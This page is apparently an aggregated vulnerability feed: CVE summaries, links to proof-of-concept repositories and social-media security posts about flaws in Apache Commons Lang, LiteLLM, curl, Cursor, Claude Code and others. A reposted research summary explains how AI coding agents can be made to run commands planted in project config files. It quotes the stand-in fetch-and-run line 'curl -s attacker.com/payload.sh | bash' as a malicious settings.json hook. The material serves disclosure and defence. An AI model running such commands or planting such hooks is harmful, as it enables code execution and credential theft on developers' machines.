updated 2025-11-05T20:30:33

1 posts

Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError coul

1 repos

https://github.com/njawalkar/apache-commons-lang2

CVE-2025-59250
(8.1 HIGH)

EPSS: 0.08%

updated 2025-10-30T16:35:42.213000

1 posts

Improper input validation in JDBC Driver for SQL Server allows an unauthorized attacker to perform spoofing over a network.

CVE-2019-1367
(7.5 HIGH)

EPSS: 90.77%

updated 2025-10-22T00:32:47

1 posts

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.

1 repos

https://github.com/mandarenmanman/CVE-2019-1367

CVE-2025-59536 (CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-10-03T14:16:36

1 posts

Due to a bug in the startup trust dialog implementation, Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to

5 repos

https://github.com/NetVanguard-cmd/CVE-2025-59536

https://github.com/TreRB/ai-ide-config-guard

https://github.com/Rohitberiwala/Claude-Code-MCP-Injection-PoC

https://github.com/DBarr3/AETHER-PROTOCOL-P

https://github.com/Razi-Interactive/claude-project-scanner

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2025-54136
(7.2 HIGH)

EPSS: 0.11%

updated 2025-08-25T01:41:36.580000

1 posts

Cursor is a code editor built for programming with AI. In versions 1.2.4 and below, attackers can achieve remote and persistent code execution by modifying an already trusted MCP configuration file inside a shared GitHub repository or editing the file locally on the target's machine. Once a collaborator accepts a harmless MCP, the attacker can silently swap it for a malicious command (e.g., calc.e

1 repos

https://github.com/PRE5T0/CVE-2025-54136

CVE-2025-47987
(7.8 HIGH)

EPSS: 0.53%

updated 2025-07-14T17:38:41.223000

1 posts

Heap-based buffer overflow in Windows Cred SSProvider Protocol allows an authorized attacker to elevate privileges locally.

1 repos

https://github.com/Kryptoenix/CVE-2025-47987_PoC

exploitdb_bot@mastodon.social at 2026-04-30T09:51:08.000Z ##

🚨 New Exploit: Windows 11 23H2 - Denial of Service (DoS)
📋 CVE: CVE-2025-47987
👤 Author: tryhardertryh

🔗 exploit-db.com/exploits/52541

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-47987

##

CVE-2024-46987
(7.7 HIGH)

EPSS: 24.00%

updated 2025-04-17T19:15:59.520000

1 posts

Camaleon CMS is a dynamic and advanced content management system based on Ruby on Rails. A path traversal vulnerability accessible via MediaController's download_private_file method allows authenticated users to download any file on the web server Camaleon CMS is running on (depending on the file permissions). This issue may lead to Information Disclosure. This issue has been addressed in release

10 repos

https://github.com/sparrowhawk1113/Exploit-for-CVE-2024-46987

https://github.com/Ik0nw/CVE-2024-46987

https://github.com/0xmrsecurity/Public_Poc

https://github.com/BLUEBERRYP1LL/CVE-2024-46987

https://github.com/ramzerk/CVE-2024-46987

https://github.com/L1337Xi/CVE-2024-46987

https://github.com/advaitpathak21/CVE-2024-46987

https://github.com/bootstrapbool/msf-cve-2024-46987

https://github.com/Goultarde/CVE-2024-46987

https://github.com/Rival420/CVE-2024-46987

exploitdb_bot@mastodon.social at 2026-04-30T07:31:12.000Z ##

🚨 New Exploit: Camaleon CMS v2.9.0 - Path Traversal
📋 CVE: CVE-2024-46987
👤 Author: velampudisakshi

🔗 exploit-db.com/exploits/52531

#ExploitDB #InfoSec #CyberSecurity #CVE-2024-46987

##

CVE-2025-29787 (CVSS UNKNOWN)

EPSS: 0.33%

updated 2025-03-19T15:51:05

1 posts

### Summary In the archive extraction routine of affected versions of the `zip` crate, symbolic links earlier in the archive are allowed to be used for later files in the archive without validation of the final canonicalized path, allowing maliciously crafted archives to overwrite arbitrary files in the file system when extracted. ### Details This is a variant of the [zip-slip](https://github.

exploitdb_bot@mastodon.social at 2026-04-30T08:01:06.000Z ##

🚨 New Exploit: Js2Py 0.74 - RCE
📋 CVE: CVE-2024-28397
👤 Author: alisunbul

🔗 exploit-db.com/exploits/52532

#ExploitDB #InfoSec #CyberSecurity #CVE-2024-28397

##

exploitdb_bot@mastodon.social at 2026-04-30T08:16:05.000Z ##

🚨 New Exploit: Frigate NVR 0.16.3 - Remote Code Execution
📋 CVE: CVE-2026-25643
👤 Author: jduardo2704

🔗 exploit-db.com/exploits/52533

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25643

##

CVE-2026-42238
(0 None)

EPSS: 0.00%

2 posts

N/A

beyondmachines1 at 2026-04-30T08:01:44.217Z ##

Nginx UI Patches Critical RCE and Admin Takeover Vulnerabilities

Nginx UI released version 2.3.8 to patch four vulnerabilities, including a critical unauthenticated remote code execution flaw (CVE-2026-42238) and multiple high-severity setup takeover issues. These flaws allow attackers to gain full administrative control, execute arbitrary commands, and steal sensitive configuration secrets.

**If you are running Nginx UI, if possible make sure the management interface is isolated from the internet and accessible only from trusted networks or via VPN. Update to version 2.3.8 ASAP and rotate all secrets (JWT keys, node secrets, API keys) since older versions are vulnerable during every restart.**

beyondmachines.net/event_detai

##

CVE-2026-24897
(0 None)

EPSS: 0.19%

1 posts

N/A

exploitdb_bot@mastodon.social at 2026-04-30T07:21:12.000Z ##

🚨 New Exploit: Erugo 0.2.14 - Remote Code Execution (RCE)
📋 CVE: CVE-2026-24897
👤 Author: abdulmoiz

🔗 exploit-db.com/exploits/52529

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24897

##

CVE-2026-42208
(0 None)

EPSS: 0.00%

7 posts

N/A

1 repos

https://github.com/imjdl/CVE-2026-42208_lab

allaboutsecurity@mastodon.social at 2026-04-30T05:36:22.000Z ##

LiteLLM-Sicherheitslücke CVE-2026-42208: SQL-Injection binnen 36 Stunden nach Veröffentlichung aktiv ausgenutzt

all-about-security.de/litellm-

#llm #cve #cybersecurity

##

Sempf at 2026-04-30T03:44:31.490Z ##

This is the issue with AI in criminal hands. Speed to market.

thehackernews.com/2026/04/lite

##

beyondmachines1@infosec.exchange at 2026-04-29T12:01:44.000Z ##

Critical SQL Injection Vulnerability in LiteLLM AI Gateway Exploited in the Wild

LiteLLM patched a critical pre-authentication SQL injection vulnerability (CVE-2026-42208) that allows attackers to steal cloud provider credentials and master API keys. The flaw was exploited in the wild within 36 hours of disclosure, targeting sensitive database tables used for AI gateway management.

**If you run LiteLLM, update to version 1.83.7 immediately to patch CVE-2026-42208, and isolate the proxy from the internet so it's only reachable from trusted networks. Assume any internet-exposed instance has been compromised - rotate all virtual API keys and provider credentials (OpenAI, Anthropic, AWS Bedrock) right away.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

LLMs@activitypub.awakari.com at 2026-04-29T08:54:39.000Z ##

LiteLLM Proxy Gateway Under Active SQLi Exploitation

Threat actors are exploiting CVE-2026-42208, a critical pre-authentication SQL injection flaw in LiteLLM, a widely-used open-source gateway for ...

##

hackerworkspace@infosec.exchange at 2026-04-28T18:31:03.000Z ##

CVE-2026-42208: Targeted SQL injection against LiteLLM's authentication path discovered 36 hours following vulnerability disclosure | Sysdig

sysdig.com/blog/cve-2026-42208

Read on HackerWorkspace: hackerworkspace.com/article/cv

#authentication #aisecurity #vulnerability

##

CVE-2026-26015
(0 None)

EPSS: 0.00%

2 posts

N/A

offseq at 2026-04-30T00:00:38.128Z ##

🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! radar.offseq.com/threat/cve-20

##

CVE-2026-7426
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-29T23:00:22.000Z ##

🟠 CVE-2026-7426 - High (8.1)

Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25262
(0 None)

EPSS: 0.00%

1 posts

N/A

ari@doskel.net at 2026-04-29T17:11:40.000Z ##

ooo its vulnerable to CVE-2026-25262

##

CVE-2026-5545
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-6253
(0 None)

EPSS: 0.00%

1 posts

N/A

CVE-2026-7168
(0 None)

EPSS: 0.00%

1 posts

N/A

CVE-2026-6429
(0 None)

EPSS: 0.00%

1 posts

N/A

CVE-2026-41649
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-28T22:30:23.000Z ##

🟠 CVE-2026-41649 - High (7.7)

Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference. When both `collectionId` and `documentId` are provid...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
